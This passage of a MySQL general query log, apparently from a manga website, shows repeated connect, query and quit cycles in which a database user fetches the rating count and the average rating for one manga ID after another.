total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330658868 Quit 330658869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330658869 Quit 330658870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330658870 Quit 330658871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330658871 Quit 330658872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330658872 Quit 330658873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330658873 Quit 330658874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330658874 Quit 330658875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330658875 Quit 330658876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330658876 Quit 330658877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330658877 Quit 330658878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330658878 Quit 330658879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330658879 Quit 330658880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330658880 Quit 330658881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330658881 Quit 330658882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330658882 Quit 330658883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330658883 Quit 330658884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330658884 Quit 330658885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330658885 Quit 330658886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330658886 Quit 330658887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330658887 Quit 330658888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330658888 Quit 330658889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330658889 Quit 330658890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330658890 Quit 330658891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330658891 Quit 330658892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330658892 Quit 330658893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330658893 Quit 330658894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330658894 Quit 330658895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330658895 Quit 330658896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330658896 Quit 330658897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330658897 Quit 330658898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330658898 Quit 330658899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330658899 Quit 330658900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330658900 Quit 330658901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330658901 Quit 330658902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330658902 Quit 330658903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330658903 Quit 330658904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330658904 Quit 330658905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330658905 Quit 330658906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330658906 Quit 330658907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330658907 Quit 330658908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330658908 Quit 330658909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330658909 Quit 330658910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330658910 Quit 330658911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330658911 Quit 330658912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330658912 Quit 330658913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330658913 Quit 330658914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330658914 Quit 330658915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330658915 Quit 330658916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330658916 Quit 330658917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330658917 Quit 330658918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330658918 Quit 330658919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330658919 Quit 330658920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330658920 Quit 330658921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330658921 Quit 330658922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330658922 Quit 330658923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330658923 Quit 330658924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330658924 Quit 330658925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330658925 Quit 330658926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330658926 Quit 330658927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330658927 Quit 330658928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330658928 Quit 330658929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330658929 Quit 330658930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330658930 Quit 330658931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330658931 Quit 330658932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330658932 Quit 330658933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330658933 Quit 330658934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330658934 Quit 330658935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330658935 Quit 330658936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330658936 Quit 330658937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330658937 Quit 330658938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330658938 Quit 330658939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330658939 Quit 330658940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330658940 Quit 330658941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330658941 Quit 330658942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330658942 Quit 330658943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330658943 Quit 330658944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330658944 Quit 330658945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330658945 Quit 330658946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330658946 Quit 330658947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330658947 Quit 330658948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330658948 Quit 330658949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330658949 Quit 330658950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330658950 Quit 330658951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330658951 Quit 330658952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330658952 Quit 330658953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330658953 Quit 330658954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330658954 Quit 330658955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330658955 Quit 330658956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330658956 Quit 330658957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330658957 Quit 330658958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330658958 Quit 330658959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330658959 Quit 330658960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330658960 Quit 330658961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330658961 Quit 330658962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330658962 Quit 330658963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330658963 Quit 330658964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330658964 Quit 330658965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330658965 Quit 330658966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330658966 Quit 330658967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330658967 Quit 330658968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330658968 Quit 330658969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330658969 Quit 330658970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330658970 Quit 330658971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330658971 Quit 330658972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330658972 Quit 330658973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330658973 Quit 330658974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330658974 Quit 330658975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330658975 Quit 330658976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330658976 Quit 330658977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330658977 Quit 330658978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330658978 Quit 330658979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330658979 Quit 330658980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330658980 Quit 330658981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330658981 Quit 330658982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330658982 Quit 330658983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330658983 Quit 330658984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330658984 Quit 330658985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330658985 Quit 330658986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330658986 Quit 330658987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330658987 Quit 330658988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330658988 Quit 330658989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330658989 Quit 330658990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330658990 Quit 330658991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330658991 Quit 330658992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330658992 Quit 330658993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330658993 Quit 330658994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330658994 Quit 330658995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330658995 Quit 330658996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330658996 Quit 330658997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330658997 Quit 330658998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330658998 Quit 330658999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330658999 Quit 330659000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330659000 Quit 330659001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330659001 Quit 330659002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330659002 Quit 330659003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330659003 Quit 330659004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330659004 Quit 330659005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330659005 Quit 330659006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330659006 Quit 330659007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330659007 Quit 330659008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330659008 Quit 330659009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330659009 Quit 330659010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330659010 Quit 330659011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330659011 Quit 330659012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330659012 Quit 330659013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330659013 Quit 330659014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330659014 Quit 330659015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330659015 Quit 330659016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330659016 Quit 330659017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330659017 Quit 330659018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330659018 Quit 330659019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330659019 Quit 330659020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330659020 Quit 330659021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659021 Query select count(id) as total_rating, 